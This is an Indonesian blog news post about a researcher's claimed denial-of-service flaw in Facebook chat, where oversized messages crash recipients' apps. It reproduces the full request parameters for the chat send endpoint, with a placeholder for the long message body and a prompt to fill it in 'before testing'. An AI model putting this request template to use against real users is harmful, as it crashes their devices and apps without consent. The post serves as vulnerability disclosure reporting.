Headlines News :
Home » , » Serangan Denial of Service (DOS) Dengan Facebook Chat

Serangan Denial of Service (DOS) Dengan Facebook Chat

anaqi al aqila | 10 November 2012 | 1:43 AM

Peneliti keamanan Chris C Russo mengklaim telah menemukan cara dengan menggunakan modul chatting Facebook untuk meluncurkan serangan denial-of-service (DOS) terhadap pengguna manapun, bahkan jika tidak berteman dengan penyerang sekalipun.

Serangan Denial of Service (DOS) Dengan Facebook Chat


Russo mengungkapkan bahwa serangan itu mirip dengan yang pernah diluncurkan melalui MSN messenger. Sejumlah besar paket dikirim ke target, menyebabkan aplikasi mengalami crash. "Modul chatting yang pada saat itu sudah tidak dapat saya gunakan karena sepertinya saya telah diblokir setelah mengujinya. Tidak ada jenis batasan dalam jumlah karakter yang dapat dikirim," jelasnya.

"Memungkinkan untuk mendisconnect 3 user penguji yang berbeda (3 dari 3) dengan mengirimkan pesan yang cukup besar. Salah satunya melaporkan bahwa tabletnya restart setelah penerimaan, dan tidak memungkin lagi untuk membuka aplikasi Facebook lagi, karena log chatting akan tetap tersimpan dan itu akan membuat crash aplikasi lagi" tambahnya

Menunut peneliti, serangan DOS  memungkinkan karena parameter di http://www.facebook.com/ajax/mercury/send_messages.php

message_batch[0][action_type]=ma-type%3Auser-generated-message
&message_batch[0][thread_id]
&message_batch[0][author]=fbid%3A100000000000000
&message_batch[0][author_email]
&message_batch[0][coordinates]
&message_batch[0][timestamp]=1352175498252
&message_batch[0][timestamp_absolute]=Today
&message_batch[0][timestamp_relative]=1%3A19am
&message_batch[0][is_unread]=false
&message_batch[0][is_cleared]=false
&message_batch[0][is_forward]=false
&message_batch[0][spoof_warning]=false
&message_batch[0][source]=source%3Achat%3Aweb
&message_batch[0][source_tags][0]=source%3Achat
&message_batch[0][body]=%3C<EXTREMLY LONG MESSAGE HERE>%3E
&message_batch[0][has_attachment]=false
&message_batch[0][html_body]=false
&
&message_batch[0][specific_to_list][0]=fbid%3A126000000
&message_batch[0][specific_to_list][1]=fbid%3A100000000000000
&message_batch[0][status]=0
&message_batch[0][message_id]=%3C1352175400000%3A3112200000-1080509979%40mail.projektitan.com%3E
&
&message_batch[0][client_thread_id]=user%3A1263600000
&client=mercury
&__user=100001220521369
&__a=1
&fb_dtsg=AQDT8YAC
&phstamp=1658168845689000000000

(Properly replace the <EXTREMLY LONG MESSAGE HERE> before testing)

Dia telah mengungkapkan bahwa serangan ini dapat dikurangi dengan menganalisis length parameter sebelum mengirimkan informasi ke pengguna. "Secara pribadi saya percaya bahwa pasti ada sesuatu yang salah juga dengan token XSRF, karena memungkinkan saya untuk mengirim beberapa paket dengan menggunakan cara yang sama yang awalnya saya ekstrak" tulis Russo pada Seclist.org

Ahli tersebut mengklaim bahwa kerentanan ini telah ia temukan sejak dulu, tapi Facebook butuh waktu 6 minggu untuk membalas laporannya dan hanya mengatakan kepada Russo bahwa "tidak ada cacat sama sekali".

Sumber: Seclists.org
Share this article :
 
█║▌│█│║▌║││█║▌│║▌║█║║▌
Cyber4rt © 2015 | Some Rights Reserved
ABOUTCONTACTDISCLAIMERPRIVACY POLICYSITEMAPTERMS
Powered by Blogger